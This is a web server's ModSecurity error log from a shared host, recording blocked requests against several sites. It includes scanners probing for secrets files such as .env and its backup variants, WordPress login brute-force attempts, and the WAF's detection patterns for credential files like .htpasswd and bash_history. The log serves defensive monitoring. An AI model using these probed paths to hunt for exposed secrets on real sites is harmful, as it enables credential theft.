[Tue May 26 19:38:46.723337 2026] [security2:error] [pid 70836:tid 70991] [client 207.241.173.18:21448] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahWpbu_FvbQ_BhqVMRV5bwAAAJ4"]
[Tue May 26 19:38:46.724257 2026] [security2:error] [pid 70836:tid 71008] [client 207.241.173.18:21478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahWpbu_FvbQ_BhqVMRV5aQAAAK8"]
[Tue May 26 19:38:46.724728 2026] [security2:error] [pid 70836:tid 71001] [client 207.241.173.18:21428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahWpbu_FvbQ_BhqVMRV5dAAAAKg"]
[Tue May 26 19:38:46.725552 2026] [security2:error] [pid 70836:tid 71019] [client 207.241.173.18:21472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.acacia.org.in"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahWpbu_FvbQ_BhqVMRV5dQAAALo"]
[Tue May 26 19:38:46.844180 2026] [security2:error] [pid 70836:tid 70880] [remote 92.205.109.21:40428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpbu_FvbQ_BhqVMRV5dgAAySs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:38:47.102499 2026] [security2:error] [pid 70836:tid 71050] [client 172.114.235.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpbu_FvbQ_BhqVMRV5ZAAAANk"]
[Tue May 26 19:38:48.822857 2026] [security2:error] [pid 70836:tid 71031] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpcO_FvbQ_BhqVMRV5uAAAAMY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1126632&moderation-hash=59b6df6061510784a9028b48d419324d
[Tue May 26 19:38:49.022260 2026] [security2:error] [pid 70836:tid 71003] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpcO_FvbQ_BhqVMRV5sgAAAKo"]
[Tue May 26 19:38:49.303744 2026] [security2:error] [pid 70836:tid 70941] [remote 178.32.30.56:34490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.30.32.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWpce_FvbQ_BhqVMRV5ywAA9mg"]
[Tue May 26 19:38:49.705517 2026] [security2:error] [pid 70836:tid 70974] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpce_FvbQ_BhqVMRV53gAAAI0"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1126632&moderation-hash=59b6df6061510784a9028b48d419324d
[Tue May 26 19:38:51.018219 2026] [security2:error] [pid 70836:tid 70894] [remote 178.32.30.56:34490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.30.32.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWpc-_FvbQ_BhqVMRV6BgAA_zk"], referer: https://tea.canopykaapi.com/wp-login.php
[Tue May 26 19:38:51.147334 2026] [security2:error] [pid 70836:tid 71006] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpcu_FvbQ_BhqVMRV6AAAAAK0"]
[Tue May 26 19:38:51.555044 2026] [security2:error] [pid 70836:tid 70918] [remote 74.7.241.58:34322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWpc-_FvbQ_BhqVMRV6GQAAi1E"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:38:52.545435 2026] [security2:error] [pid 70836:tid 71027] [client 68.183.28.90:55272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWpdO_FvbQ_BhqVMRV6JgAAAMI"], referer: https://www.xmyadea.top/
[Tue May 26 19:38:52.954463 2026] [security2:error] [pid 70836:tid 70989] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpdO_FvbQ_BhqVMRV6NgAAAJw"]
[Tue May 26 19:38:53.450963 2026] [security2:error] [pid 70836:tid 70967] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpde_FvbQ_BhqVMRV6VgAAAIY"]
[Tue May 26 19:38:53.451003 2026] [security2:error] [pid 70836:tid 70967] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpde_FvbQ_BhqVMRV6VgAAAIY"]
[Tue May 26 19:38:53.451240 2026] [security2:error] [pid 70836:tid 70971] [client 65.109.156.37:62346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/homepages/portfolio-photo/"] [unique_id "ahWpde_FvbQ_BhqVMRV6VAAAAIo"]
[Tue May 26 19:38:55.172849 2026] [security2:error] [pid 70836:tid 71071] [client 185.191.171.15:60658] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahWpd-_FvbQ_BhqVMRV6lgAAAO4"]
[Tue May 26 19:38:55.172958 2026] [security2:error] [pid 70836:tid 71071] [client 185.191.171.15:60658] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahWpd-_FvbQ_BhqVMRV6lgAAAO4"]
[Tue May 26 19:38:55.560478 2026] [security2:error] [pid 70836:tid 71017] [client 113.187.121.59:43924] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWpd-_FvbQ_BhqVMRV6lQAAALg"], referer: https://www.xmyadea.top/
[Tue May 26 19:38:55.950528 2026] [security2:error] [pid 70836:tid 71037] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpd-_FvbQ_BhqVMRV6pgAAAMw"]
[Tue May 26 19:38:57.314721 2026] [security2:error] [pid 70836:tid 71063] [client 52.186.171.52:54262] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.198.65"] [uri "/index.cgi"] [unique_id "ahWpee_FvbQ_BhqVMRV63AAAAOY"]
[Tue May 26 19:38:57.383682 2026] [security2:error] [pid 70836:tid 70929] [remote 171.235.163.210:38852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpee_FvbQ_BhqVMRV62wAAvVw"]
[Tue May 26 19:38:58.400632 2026] [security2:error] [pid 70836:tid 71059] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpee_FvbQ_BhqVMRV69AAAAOI"]
[Tue May 26 19:38:58.670560 2026] [security2:error] [pid 70836:tid 70910] [remote 153.122.170.42:51708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpeu_FvbQ_BhqVMRV7CwAA3Uk"]
[Tue May 26 19:39:00.599175 2026] [security2:error] [pid 70836:tid 70855] [remote 153.122.170.42:51708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpfO_FvbQ_BhqVMRV7UQAA-RI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:39:00.619096 2026] [security2:error] [pid 70836:tid 70990] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpfO_FvbQ_BhqVMRV7UAAAAJ0"]
[Tue May 26 19:39:03.033791 2026] [security2:error] [pid 70836:tid 70885] [remote 118.70.190.36:52166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.190.70.118.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWpfu_FvbQ_BhqVMRV7nwAA3DA"]
[Tue May 26 19:39:03.409432 2026] [security2:error] [pid 70836:tid 71043] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpfu_FvbQ_BhqVMRV7pgAAANI"]
[Tue May 26 19:39:03.594056 2026] [security2:error] [pid 70836:tid 70858] [remote 118.70.190.36:52166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.190.70.118.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWpf-_FvbQ_BhqVMRV7uQAAmBU"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:39:05.012922 2026] [security2:error] [pid 70836:tid 70954] [remote 46.20.146.46:46698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpgO_FvbQ_BhqVMRV75wAA_3U"]
[Tue May 26 19:39:05.114756 2026] [security2:error] [pid 70836:tid 70996] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpgO_FvbQ_BhqVMRV75gAAAKM"]
[Tue May 26 19:39:05.333452 2026] [autoindex:error] [pid 70836:tid 70984] [client 185.169.4.152:53484] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:39:05.335753 2026] [security2:error] [pid 70836:tid 70848] [remote 153.122.170.42:44002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWpge_FvbQ_BhqVMRV7-AAA0gs"]
[Tue May 26 19:39:05.809854 2026] [security2:error] [pid 70836:tid 70870] [remote 153.122.170.42:44002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWpge_FvbQ_BhqVMRV8CQAA0SE"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:39:06.844828 2026] [security2:error] [pid 70836:tid 70867] [remote 141.138.139.98:37496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWpgu_FvbQ_BhqVMRV8JQAA6x4"]
[Tue May 26 19:39:07.241811 2026] [security2:error] [pid 70836:tid 70871] [remote 46.20.146.46:46698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpg-_FvbQ_BhqVMRV8OQAAniI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:39:07.821341 2026] [security2:error] [pid 70836:tid 71049] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpg-_FvbQ_BhqVMRV8RAAAANg"]
[Tue May 26 19:39:08.722493 2026] [security2:error] [pid 70836:tid 70874] [remote 141.138.139.98:37496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWphO_FvbQ_BhqVMRV8dQAAxiU"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:39:10.339640 2026] [security2:error] [pid 70836:tid 71050] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWphe_FvbQ_BhqVMRV8lwAAANk"]
[Tue May 26 19:39:12.128375 2026] [security2:error] [pid 70836:tid 70973] [client 79.117.176.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWph-_FvbQ_BhqVMRV81wAAAIw"]
[Tue May 26 19:39:12.152227 2026] [security2:error] [pid 70836:tid 71045] [client 114.119.155.55:40407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/mersin-web-tasarim-hazar-lojistik"] [unique_id "ahWpiO_FvbQ_BhqVMRV86gAAANQ"], referer: http://cagmedya.com/
[Tue May 26 19:39:12.394972 2026] [security2:error] [pid 70836:tid 71027] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWph-_FvbQ_BhqVMRV83QAAAMI"]
[Tue May 26 19:39:13.284287 2026] [proxy:error] [pid 70836:tid 71008] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:39:13.284339 2026] [proxy_http:error] [pid 70836:tid 71008] [client 205.210.31.49:58796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:39:13.284931 2026] [proxy:error] [pid 70836:tid 71008] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:39:13.284967 2026] [proxy_http:error] [pid 70836:tid 71008] [client 205.210.31.49:58796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:39:14.290285 2026] [security2:error] [pid 70836:tid 71039] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpie_FvbQ_BhqVMRV9IQAAAM4"]
[Tue May 26 19:39:15.280662 2026] [security2:error] [pid 70836:tid 70882] [remote 18.209.220.99:58081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpi-_FvbQ_BhqVMRV9RAAA8C0"]
[Tue May 26 19:39:15.850532 2026] [security2:error] [pid 70836:tid 71081] [client 176.65.139.231:49384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ans.onesoft.in"] [uri "/.env"] [unique_id "ahWpi-_FvbQ_BhqVMRV9YwAAAPg"]
[Tue May 26 19:39:16.570581 2026] [security2:error] [pid 70836:tid 70970] [client 47.128.43.94:52924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "operatives.org.in"] [uri "/robots.txt"] [unique_id "ahWpjO_FvbQ_BhqVMRV9eQAAAIk"]
[Tue May 26 19:39:17.089111 2026] [security2:error] [pid 70836:tid 70900] [remote 49.12.3.147:35004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpjO_FvbQ_BhqVMRV9hgAA7j8"]
[Tue May 26 19:39:17.298378 2026] [security2:error] [pid 70836:tid 71065] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpjO_FvbQ_BhqVMRV9hQAAAOg"]
[Tue May 26 19:39:17.353965 2026] [security2:error] [pid 70836:tid 71041] [client 212.34.141.234:54469] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "212.34.141.234" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWpje_FvbQ_BhqVMRV9mwAAANA"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 19:39:17.354099 2026] [security2:error] [pid 70836:tid 71041] [client 212.34.141.234:54469] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWpje_FvbQ_BhqVMRV9mwAAANA"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
[Tue May 26 19:39:18.241328 2026] [security2:error] [pid 70836:tid 70909] [remote 18.209.220.99:58081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpju_FvbQ_BhqVMRV9twAAnEg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:39:18.655767 2026] [security2:error] [pid 70836:tid 70939] [remote 171.235.163.210:40990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpju_FvbQ_BhqVMRV93wAA3WY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:39:19.433297 2026] [security2:error] [pid 70836:tid 71031] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpju_FvbQ_BhqVMRV97gAAAMY"]
[Tue May 26 19:39:20.146831 2026] [security2:error] [pid 70836:tid 71003] [client 45.81.136.186:42193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.136.81.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahWpj-_FvbQ_BhqVMRV-EwAAAKo"], referer: https://www.yourstorybag.com/what-kind-of-questions-do-you-ask-when-you-tell-stories-to-children/
